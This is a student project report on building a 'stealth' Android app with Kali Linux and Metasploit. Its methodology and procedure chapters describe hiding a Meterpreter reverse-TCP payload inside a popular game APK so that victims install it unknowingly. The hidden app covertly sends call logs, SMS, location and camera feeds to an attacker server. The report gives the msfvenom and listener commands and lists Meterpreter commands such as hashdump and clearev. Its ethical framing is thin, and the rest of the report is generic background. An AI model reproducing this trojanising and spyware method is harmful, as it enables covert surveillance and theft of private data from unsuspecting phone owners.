STEALTH APPLICATION USING KALI

LINUX

Submitted in partial fulfilment of the requirements of Business

Communication and Ethics
Prepared By:
Name Roll No
Muhammad Tabish Quadri 551
Riya John 554
Sanket Said 555
Diksha Tiwary 570

Submitted to:
Prof. Darshana Pachkawade
(Department Of Humanities)

Department Of Computer Engineering

Pillai College Of Engineering
New Panvel – 410 206
University Of Mumbai
Academic Year (2018-2019)
 Acknowledgement
We have put in a lot of efforts and dedicatedly worked to wards completing this
report. However, this would have not been possible were it not for the constant
motivation and encouragement that we received from the teaching as well as non
teaching faculty of our college. We would like to express our heartfelt gratitude to our
Principal Prof. Dr. Sandeep Joshi for providing a platform for us students to showcase
our skills and knowledge. We are thankful to The Department of Computer
Engineering and our Head Of Department Prof. Dr. Madhumita Chatterjee for
providing us the necessary resources and information. We extend our thanks to the
Head Of Department of Humanities Porf. Dr. Malavika Sharma and our Business
Communication and Ethics teacher Prof. Darshana Pachkawade for the constant
supervision and guidance during the process of report making. We would like to thank
all the Lab Assistants and the Librarians for providing us with the latest softwares and
references required. We would also like to expand our deepest gratitude to all those
who have directly and indirectly guided us in completing this project.

I
 Summary

The term ‘Stealth’ applies to certain computer viruses, and to a state of affairs in
which a computer or port is rendered invisible to hacking programs. A stealth
application is an application that enables an attacker or any person who is not the
owner of the computer system under question to operate or gain information from the
target device. The operating system used is Kali Linux which is commonly used for
digital forensics and penetration testing. It’s inbuilt tool Metasploit Interpreter which
is an advanced mulitifunction payload used for writing, testing and using exploit code
is used for carrying out the stealth work. A commonly application is binded with the
apk (i.e. Android application PacKage- the package file format used by the Android
operating system for distribution and installation of mobile apps) which can be
installed through a web link or a bluetooth transfer on any android mobile phone. The
apk is in the form of an invisible attachment i.e there is no icon suggesting the
presence of an extra app except what the user originally wanted to install so as to be
hidden from the user. The application contacts the main server as per the programmed
time and receives the instructions such as to retrieve call logs, SMSes, current
location, etc. In case of absence of the internet the application also sends the
information through SMS in stealth mode. Stealth programs allow security nodes to
be disabled and resources to be looted. The project is made with an ethical intention.
Such an application if used for ethical needs will be helpful in tracking down the
device usage of suspicious people and putting an end to the activity and also in the
detection and prevention of destruction, violence and extremism.

II
 Table Of Contents

Acknowledgement I
Summary II
1. Introduction 1
2. Literature Review 2
3. Methodology 4
4. Procedure 5
5. Kali Linux 7
6. Metasploit Interpreter 10
7. Ethical Hacking 13
8. Cyber Security 16
9. Conclusion & Future Scope 19
References III
Appendix IV
Index V
 Chapter 01
Introduction

The concept of stealth is to operate or hide without giving enemy forces any
indications as to the presence of friendly forces. Stealth technology is a sub discipline
of military tactics, which covers a range of techniques wised with personal aircraft,
ships, submarines, missiles, satellites to make them less visible to the infrared,
radar,sonar and other detection methods. Generally, stealth describes any approach to
doing something while avoiding notice. In computing, stealth refers to an event,
object, or file that evades methodical attempts to find it.

A stealth application as the name suggests, is an application that makes a computer or

port rendered invisible to hacking programs. It is a computer application that uses
various mechanisms to avoid detection by antivirus software. Applications with a
exploit code i.e. is a piece of software, a chunk of data, or a sequence of commands
that takes advantage of a bug or vulnerability to cause unintended or unanticipated
behavior to occur on computer software, hardware, or something electronic, escape
notice without being specifically designed to do so . Such an applicationis used to
gain control of a computer system.

The idea of a stealth application comes from stealth viruses which are used by hackers
to gain access into some other user’s system without their permission. Stealth viruses
are nothing new. The first known virus for PCs, Brain (reportedly created by software
developers as an anti-piracy measure), was a stealth virus that infected the boot sector
in storage.

The creation of a stealth application was a challenge as the app has to be made in a
way as to not violate the user’s privacy and at the same time to tactically gain the
information required. The stealth application that was created was an application
meant not to exploit a innocent user but to gain information from or to track the
people involved in some kind of an activity that would cause harm to the society.

1
 Chapter 02
Literature Review

Casandra Beyer of SA IT Services, Marietta, Georgia published a research paper titled

Mobile Security in International Journal of Computer Applications in the month of
July 2014 in which she described the loopholes in the security features of android
system and how vulnerable it actually is and she also provided solutions for these
vulnerabilities.

Konglin Zhu, Xiaoman He, Bin Xiang and Lin Zhang of School of Information and
Communication Engineering, Beijing University of Posts and Telecommunications,
Beijing, China and Achille Pattavina of Dipartimento di Elettronica e Informazione,
Politecnico di Milano, Milano, Italy published a research paper for Hindawi
Publishing Corporation titled How Dangerous Are Your Smartphones? App Usage
Recommendation with Privacy Preserving on 24 May 2016. Their research was based
around the fact that the apps that are recommended to a user are based on popularity
and the privacy of the app is not considered. They provided a solution to this problem
by modifying the app stores recommendation constraints thus giving the apps with
better privacy more recommendation. They even proposed a privacy evaluation
mechanism by analyzing app data usage.

Syed Farhan Alam Zaidi, Department of Computer Science, COMSATS Institute of

Information Technology, Islamabad, Pakistan, Qaisar Javaid of Department of
Computer Science & Software Engineering, International Islamic University,
Islamabad, Pakistan and Sijing Zhang of Department of Computer Science &
Technology, University of Bedfordshire, Luton, UK published a research paper for
International Journal of Advanced Computer Science and Applications (IJACSA)
titled Survey on Security for Smartphone Device in the year 2016. They researched on
how the increase in the technology and the use of smartphone have made them
vulnerable to malware they researched on all the operating systems of smartphones
and came up with the categories of attacks that is old attacks and new attacks.

Serge Egelman, Adrienne Porter Felt and David Wagner of university of California,
Berkeley published a research paper titled Choice Architecture and Smartphone

2
Privacy There’s A Price for “That” in the year of 2016 for International Journal of
Scientific and Research Publications. They researched on how the architectures of
different phones affect their privacy and how the permissions that we grant particular
apps affect our privacy. They even surveyed among smartphone users on the basis of
how much they are willing to pay for an app asking less permissions and having the
least amount of access to user’s personal data and upon more observations they came
to the conclusion that users view the permission to access location as something that
gives them more functionality rather than considering it as an attack on privacy.

Kiran Gurung of Department of Electronics and Computer Engineering, IOE,

Tapathali, Kathmandu published a research paper for researchgate.net titled
Metasploit Framework with Kali Linux on March 10, 2017. In this paper she
described the basic framework of metasploit interpreter and explained how it can be
used to upload payload to other computers on a network.

Umesh Timalsina of Advance Telecommunication Department, State University of

Texas published an article titled Kali Linux as a Server on 10 March 2017 in which he
described how Kali Linux can effectively work as server for remote accessing
activities.

Michael D Moore of Computer Department, Jackson State University, USA published

research paper titled Penetrating Testing and Metasploit on 3 April 2017 in which he
described advanced use of Kali Linux in Penetration Testing. He explained how the
current android devices are now highly vulnerable to remote hacking and inisited that
they should be protected with some major updates.

3
 Chapter 03
Methodology

The motive of the project was to create an app that will be installed in the target’s
device without their knowledge i.e. stealthily. In order to do so an exploit code was
developed and executed against a remote target machine which in this case was the
user’s mobile phone.

A commonly used application like the popular game ‘Flappy Bird’ was used instead
of creating one on our own so that the target will install the app without any
hesitation. The apk of the app was downloaded by the user through a web link or
Bluetooth share. The apk of the stealth application was bounded to the apk of the
gaming app that will be downloaded by the user. As soon as the user installed the
game, the stealth app was installed in the user’s device as well but it remains in
background and the icon won’t be visible to the user. The app will contact the main
server i.e. the system from which the apk was sent, on a regular basis and will send
the information such as the call log, SMSes, the latitude and the longitude of the
current location of the device to the main server. In case of non-availability of the
internet the required information will be extracted and will be sent to the main server
via SMS.

Operating system of server used was Kali Linux which is a Debian-derived Linux
distribution designed for digital forensics and penetration testing. An inbuilt tool
Metasploit interpreter was used for carrying out the stealth work. It is used by novices
and advanced professionals. Metapreter- as it is commonly known, is among the most
widely used exploitation tool in the hacking/security field. It is an exploitation
framework and is used as a tool for developing and executing exploit code against a
remote target machine which in this case is the user’s mobile phone. It was used to
upload the file in the target device and is used to control the operations from the main
server.

4
 Chapter 04
Procedure

The procedure for binding the apk of the stealth app along with the apk of the user’s
app is as follows:
1. Making the Malicious Apk:
We started off by making our meterpreter apk. We entered this code in the terminal:-
msfvenom -p android/meterpreter/reversetcp LHOST=(your ip) LPORT=(your port) -
o app.apk

This will create app.apk in your current folder.

2. Setting up a Listener:
The following commands were entered to set up a listener
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.0.4
Exploit

5
3. Extraction:
To extract information about the user’s call logs,sms,etc. We use the following
commands which can be easily sought whenever needed by tying the ‘help command:

Using the above command we can extract the call logs, smses, contacts,etc. We can
also access their camera and can live stream from the user’s device. We can

6
 Chapter 05
Kali Linux

Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration

Testing and Security Auditing. Kali contains several hundred tools which are geared
towards various information security tasks, such as Penetration Testing, Security
research, Computer Forensics and Reverse Engineering. Kali Linux is developed,
funded and maintained by Offensive Security, a leading information security training
company.

Kali Linux was released on the 13th March, 2013 as a complete, top-to-
bottom rebuild of BackTrack Linux, adhering completely to Debian development
standards.

 More than 600 penetration testing tools included: After reviewing every
tool that was included in BackTrack, we eliminated a great number of tools that
either simply did not work or which duplicated other tools that provided the
same or similar functionality. Details on what’s included are on the Kali
Tools site.

 Free and always will be: Kali Linux, like BackTrack, is completely free of
charge and always will be. You will never, ever have to pay for Kali Linux.

 Open source Git tree: We are committed to the open source development
model and our development tree is available for all to see. All of the
source code which goes into Kali Linux is available for anyone who wants to
tweak or rebuild packages to suit their specific needs.

 FHS compliant: Kali adheres to the Filesystem Hierarchy Standard, allowing

Linux users to easily locate binaries, support files, libraries, etc.

 Wide-ranging wireless device support: A regular sticking point with Linux

distributions has been supported for wireless interfaces. We have built Kali
Linux to support as many wireless devices as we possibly can, allowing it to run
properly on a wide variety of hardware and making it compatible with
numerous USB and other wireless devices.

7
  Custom kernel, patched for injection: As penetration testers, the
development team often needs to do wireless assessments, so our kernel has the
latest injection patches included.

 Developed in a secure environment: The Kali Linux team is made up of a

small group of individuals who are the only ones trusted to commit packages
and interact with the repositories, all of which is done using multiple secure
protocols.

 GPG signed packages and repositories: Every package in Kali Linux

is signed by each individual developer who built and committed it, and the
repositories subsequently sign the packages as well.

 Multi-language support: Although penetration tools tend to be written in

English, we have ensured that Kali includes true multilingual support, allowing
more users to operate in their native language and locate the tools they need for
the job.

 Completely customizable: We thoroughly understand that not everyone will

agree with our design decisions, so we have made it as easy as possible for our
more adventurous users to customize Kali Linux to their liking, all the way
down to the kernel.

 ARMEL and ARMHF support: Since ARM-based single-board systems like

the Raspberry Pi and BeagleBone Black, among others, are becoming more and
more prevalent and inexpensive, we knew that Kali’s ARM support would need
to be as robust as we could manage, with fully working installations for
both ARMEL and ARMHFsystems. Kali Linux is available on a wide range of
ARM devices and has ARM repositories integrated with the mainline
distribution so tools for ARM are updated in conjunction with the rest of the
distribution.

Kali Linux is specifically tailored to the needs of penetration testing professionals,

and therefore all documentation on this site assumes prior knowledge of, and
familiarity with, the Linux operating system in general.

8
Kali Linux is specifically geared to meet the requirements of professional penetration
testing and security auditing. To achieve this, several core changes have been
implemented in Kali Linux which reflect these needs:

 Single user, root access by design: Due to the nature of security audits, Kali
Linux is designed to be used in a “single, root user” scenario. Many of the
tools used in penetration testing require escalated privileges, and while it’s
generally sound policy to only enable root privileges when necessary, in the
use cases that Kali Linux is aimed at, this approach would be a burden.

 Network services disabled by default: Kali Linux contains systemd hooks

that disable network services by default. These hooks allow us to install
various services on Kali Linux, while ensuring that our distribution remains
secure by default, no matter what packages are installed. Additional services
such as Bluetooth are also blacklisted by default.

 Custom Linux kernel: Kali Linux uses an upstream kernel, patched for
wireless injection.

 A minimal and trusted set of repositories: given the aims and goals of Kali
Linux, maintaining the integrity of the system as a whole is absolutely key.
With that goal in mind, the set of upstream software sources which Kali uses
is kept to an absolute minimum. Many new Kali users are tempted to add
additional repositories to their sources.list, but doing so runs a very serious
risk of breaking your Kali Linux installation.

9
 Chapter 06
Metasploit Interpreter

The Metasploit Project is a computer security project that provides information

about security vulnerabilities and aids in penetration testing and IDS
signature development.Its best-known sub-project is the open sourceMetasploit
Framework, a tool for developing and executing exploit code against a remote target
machine.

The Metasploit Framework is a platform for writing, testing, and using exploitcode.
The primary users of the Framework are professionals performing penetration testing,
shellcode development, and vulnerability research.Other important sub-projects
include the Opcode Database, shellcode archive and related research.The Metasploit
Project is well known for its anti-forensic and evasion tools, some of which are built
into the Metasploit Framework.

Metasploit Interpreter or Meterpreter is an advanced, dynamically extensible payload

that uses in-memory DLL injection stagers and is extended over the network at
runtime. It communicates over the stager socket and provides a comprehensive client-
side Ruby API. It features command history, tab completion, channels, and more.

The Meterpreter is an advanced multi-function payload that can be dynamically

extended at run-time. In normal terms, this means that it provides you with a basic
shell and allows you to add new features to it as needed.Metepreter was originally
written by skape for Metasploit 2.x, common extensions were merged for 3.x and is
currently undergoing an overhaul for Metasploit 3.3. The server portion is
implemented in plain C and is now compiled with MSVC, making it somewhat
portable. The client can be written in any language but Metasploit has a full-featured
Ruby client API.

Metasploit runs on Unix (including Linux and Mac OS X) and on Windows. The
Metasploit Framework can be extended to use add-ons in multiple languages.To
choose an exploit and payload, some information about the target system is needed,

10
such as operating system version and installed network services.Metasploit currently
has over 495.3 payloads. Some of them are:

1. Command shell enables users to run collection scripts or run arbitrary

commands against the host.

2. Meterpreter enables users to control the screen of a device using VNC

and to browse, upload and download files. We shall be using meterpreter
in the project.

3. Dynamic payloads enables users to evade anti-virus defenses by

generating unique payloads.

Using Meterpreter Commands-

These are a few of the command used in Metasploit Interpreter-
help - The ‘help‘ command, as may be expected, displays the Meterpreter help menu.
background - The ‘background‘ command will send the current Meterpreter session
to the background and return you to the msf prompt. To get back to your Meterpreter
session, just interact with it again.
cat - The ‘cat‘ command is identical to the command found on *nix systems. It
displays the content of a file when it’s given as an argument.
cd > pwd - The ‘cd‘ > ‘pwd‘ commands are used to change and display current
working directly on the target host.The change directory “cd” works the same way as
it does under DOS and *nix systems.By default, the current working folder is where
the connection to your listener was initiated.
clearev- The ‘clearev‘ command will clear the Application, System, and Security logs
on a Windows system. There are no options or arguments.
download - The ‘download‘ command downloads a file from the remote machine.
Note the use of the double-slashes when giving the Windows path.
edit- The ‘edit‘ command opens a file located on the target host.
It uses the ‘vim’ so all the editor’s commands are available.
execute -The ‘execute‘ command runs a command on the target.
getuid -Running ‘getuid‘ will display the user that the Meterpreter server is running
as on the host.

11
hashdump - The ‘hashdump‘ post module will dump the contents of the SAM
database.
ps - The ‘ps‘ command displays a list of running processes on the target.

The goals of Metasploit Interpreter are:

Stealthy:
 Meterpreter resides entirely in memory and writes nothing to disk.
 No new processes are created as Meterpreter injects itself into the compromised
process and can migrate to other running processes easily.
 By default, Meterpreter uses encrypted communications.
 All of these provide limited forensic evidence and impact on the victim machine.

Powerful:
 Meterpreter utilizes a channelized communication system.
 The TLV protocol has few limitations.

Extensible:
 Features can be augmented at runtime and are loaded over the network.
 New features can be added to Meterpreter without having to rebuild it.

12
 Chapter 07
Ethical Hacking

Hacking is the process of identifying and exploiting weakness in a system or a

network to gain unauthorized access to data and system resources. It can also be
defined as an unauthorized intrusion into the information systems/networks by an
attacker by compromising the security. Example of Hacking: Exploiting the weakness
of default password to gain access to the data stored inside the system.

Ethical Hacking sometimes called as Penetration Testing is an act of

intruding/penetrating into system or networks to find out threats, vulnerabilities in
those systems which a malicious attacker may find and exploit causing loss of data,
financial loss or other major damages. The purpose of ethical hacking is to evaluate
the security of and identify vulnerabilities in systems, networks or system
infrastructure. It includes finding and attempting to exploit any vulnerabilities to
determine whether unauthorized access or other malicious activities are possible and
improving the security of the network or systems by fixing the vulnerabilities found
during testing.

An ethical hacker, also referred to as a white hat hacker, is an information security

expert who systematically attempts to penetrate a computer system, network,
application or other computing resource on behalf of its ownersand with their
permission to find security vulnerabilities that a malicious hacker could potentially
exploit.Ethical hackers may use the same methods and tools used by the malicious
hackers but with the permission of the authorized person for the purpose of improving
the security and defending the systems from attacks by malicious users.

Ethical hackers are expected to report all the vulnerabilities and weakness found
during the process to the management.Ethical hackers use their skills and many of the
same methods and techniques to test and bypass organizations' IT security as their
unethical counterparts, who are referred to as black hat hackers. However, rather than
taking advantage of any vulnerabilities they find for personal gain, ethical hackers
document them and provide advice about how to remediate them so organizations can
strengthen their overall security.

13
Ethical hackers generally find security exposures in insecure system configurations,
known and unknown hardware or software vulnerabilities as well as operational
weaknesses in process or technical countermeasures.

Any organization that has a network connected to the Internet or provides an online
service should consider subjecting it to penetration testing conducted by ethical
hackers.

Apart from testing duties, ethical hackers are associated with other responsibilities.
The main idea is to replicate a malicious hacker at work and instead of exploiting the
vulnerabilities for malicious purposes, seek countermeasures to shore up the system’s
defenses. An ethical hacker might employ all or some of these strategies to penetrate a
system:

 Scanning ports and seeking vulnerabilities: An ethical hacker uses port scanning
tools like Nmap or Nessus to scan one’s own systems and find open ports. The
vulnerabilities with each of the ports can be studied and remedial measures can be
taken.

 An ethical hacker will examine patch installations and make sure that they cannot
be exploited.

 The ethical hacker may engage in social engineering concepts like dumpster
diving—rummaging through trash bins for passwords, charts, sticky notes, or
anything with crucial information that can be used to generate an attack.

 An ethical hacker may also employ other social engineering techniques like
shoulder surfing to gain access to crucial information or play the kindness card to
trick employees to part with their passwords.

 An ethical hacker will attempt to evade IDS (Intrusion Detection systems), IPS
(Intrusion Prevention systems), honeypots, and firewalls.

 Sniffing networks, bypassing and cracking wireless encryption, and

hijacking web servers and web applications.

14
 Ethical hackers may also handle issues related to laptop theft and employee
fraud.

While some may argue that there is no such thing as a good hacker and all white hat
hackers are actually bad hackers who have turned a new leaf, the profession is here to
stay.

As with any profession, passion for the industry is one of the key aspects to success.
This, combined with a good knowledge of networking and programming, will help a
professional succeed in the ethical hacking field.

15
 Chapter 08
Cyber Security

Cyber security is the protection of internet-connected systems, including hardware,

software and data, from cyber attacks. In a computing context, security comprises
cyber security and physical security -- both are used by enterprises to protect against
unauthorized access to data centers and other computerized systems. Information
security, which is designed to maintain the confidentiality, integrity and availability of
data, is a subset of cyber security.

Ensuring cyber security requires the coordination of efforts throughout an information

system, which includes:

 Application security

 Information security

 Network security

 Disaster recovery/business continuity planning

 Operational security

 End-user education

One of the most problematic elements of cyber security is the constantly evolving
nature of security risks. The traditional approach has been to focus resources on
crucial system components and protect against the biggest known threats, which
meant leaving components undefended and not protecting systems against less
dangerous risks.

To deal with the current environment, advisory organizations are promoting a more
proactive and adaptive approach. The National Institute of Standards and Technology
(NIST), for example, recently issued updated guidelines in its risk assessment
framework that recommend a shift toward continuous monitoring and real-time
assessments.

16
Version 1.1 of the Framework for Improving Critical Infrastructure was released in
April 2018. The voluntary cyber security framework, developed for use in the
banking, communications, defense and energy industries, can be adopted by all
sectors, including federal and state governments. President Donald Trump issued an
executive order mandating that federal agencies adopt the NIST Cyber security
Framework (NIST CSF) in May 2017.

As a result of security risks, investments in cyber security technologies and services

are increasing. In 2017, Gartner predicted that worldwide spending on information
security products and services would reach $83.4 billion -- a 7% increase from 2016 -
- and that it would continue to grow to $93 billion by 2018.

The process of keeping up with new technologies, security trends and threat
intelligence is a challenging task. However, it's necessary in order to protect
information and other assets from cyberthreats, which take many forms.

 Ransomware is a type of malware that involves an attacker locking the victim's

computer system files -- typically through encryption -- and demanding a
payment to decrypt and unlock them.

 Malware is any file or program used to harm a computer user, such as worms,
computer viruses, Trojan horses and spyware.

 Social engineering is an attack that relies on human interaction to trick users into
breaking security procedures in order to gain sensitive information that is
typically protected.

 Phishing is a form of fraud where fraudulent emails are sent that resemble emails
from reputable sources; however, the intention of these emails is to steal sensitive
data, such as credit card or login information.

The use of cybersecurity can help prevent cyberattacks, data breaches and identity
theft and can aid in risk management. When an organization has a strong sense of
network security and an effective incident response plan, it is better able to prevent
and mitigate these attacks. For example, end user protection defends information and
guards against loss or theft while also scanning computers for malicious code.

17
As the cyberthreat landscape continues to grow and emerging threats, such as the
internet of things, require hardware and software skills, it is estimated that there are 1
million unfilled cybersecurity jobs worldwide. IT professionals and other computer
specialists are needed in security jobs, such as:

 Chief information security officer (CISO) : this individual implements the

security program across the organization and oversees the IT security
department's operations.

 Security engineer : this individual protects company assets from threats with a
focus on quality control within the IT infrastructure.

 Security architect : this individual is responsible for planning, analyzing,

designing, testing, maintaining and supporting an enterprise's critical
infrastructure.

 Security analyst : this individual has several responsibilities that include planning
security measures and controls, protecting digital files, and conducting both
internal and external security audits.

18
 Chapter 09
Conclusion and Future Scope

The app created currently is quite basic and can be made more advanced by providing
more options of control over the target’s device. This will be a great help to the cyber
cell to detect any unethical or corrupt doings. It can be made more secure by adding
certain advanced features and it can be bound with a much more frequently used
application than what is used to ensure it’s widespread distribution in the time of
need.

As every coin has two sides, an application that uses stealth technology does too. It
can be extremely helpful in maintaining peace in the society if used with the intention
of public welfare but at the same time it can cause equal amount of harm if used for
the wrong deed. It can be used in tracking unethical hackers by the cyber cell so as to
catch the person responsible and to put an end to the suspicious activity. It can also be
used by the defense system of the country to prevent any violent activity and thereby
maintain peace in the society. Highster Mobile is a powerful monitoring app with
highly advanced features. Backed with the latest technology, it offers an extremely
useful technology for monitoring and user safety. The stealth app’s location tracer
receiver can give you information of the current location of the phone in case one’s
phone is lost.

The stealth application will provide a very quick way to track any illegal or unethical
activities if used in the right way by the right hands. The people managing the
application should be totally aware of their ethics and boundaries of the use of the
application. Some cell phone monitoring software companies suggest that proper
consent should be done before the installation of a stealth app. It should be made in an
ethical manner in which the phone user must be aware that his or her phone activities
will be watched upon for the sole reason of ‘monitoring’ in order to maintain safety.
The creation of the stealth app is not with the intention of invading a person’s privacy
but more in the aspect of simply monitoring required phone activities and the people
coming in contact with the user of the phone.

19
 References

Daming D. Chen, Manuel Egele, Maverick Woo, and David Brumley(2016), Towards
AutomatedDynamic Analysis for Linux-based Embedded Firmware, International
journal of open sourcetechnology [online]available:
http://www.engpaper.com/linux-2016.htm

Grey Campus, [online].available: https://www.greycampus.com/opencampus/ethical-

hacking/

G.Suganya, and K.E Narayana (2014), Defending Stealthy Mode attacks by live
detection and adoptable learning technique, International journal of computer science
and
mobilecomputation.[online]available:https://www.ijcsmc.com/docs/papers/April2014/
V3I4201499a84.pdf

Kali Training, [online]. available: https://kali.training

Tech Target, [online].avalable:

https://searchsecurity.techtarget.com/definition/cybersecurity

Tech Target, [online].avalable:

https://searchsoftwarequality.techtarget.com/definition/penetration-testing

III
 Appendix

Penetration testing- It is also called pen testing. It is the practice of testing a

computer system, network or Web application to find vulnerabilities that an attacker
could exploit. Pen tests can be automated with software applications or they can be
performed manually. Either way, the process includes gathering information about the
target before the test ,identifying possible entry points, attempting to break in
and reporting back the findings. The main objective of penetration testing is to
determine security weaknesses. A pen test can also be used to test an organization's
security policy compliance, its employees' security awareness and the organization's
ability to identify and respond to security incidents.

Stealth apps in the market- It’s no big deal to find spying apps that let you monitor
someone’s WhatsApp conversations and multimedia. Some let you spy on the
messages only, while there are such advanced apps too that facilitate monitoring
WhatsApp call logs and the multimedia shared along the conversation. They are as
follows:
1. XNSPY

2. TrackMyFone

3. Spyzie

4. Flexispy

5. Highster Mobile

6. Spymaster Pro

7. GuestSpy

8. Appmia

9. SpyBubble

10. Mobile Spy

IV
 Index

E
Exploit code 01

M
Malware 17
Metasploit Framework 10

P
Penetration Testing 07

R
Ransomware 17

W
White Hat Haker 13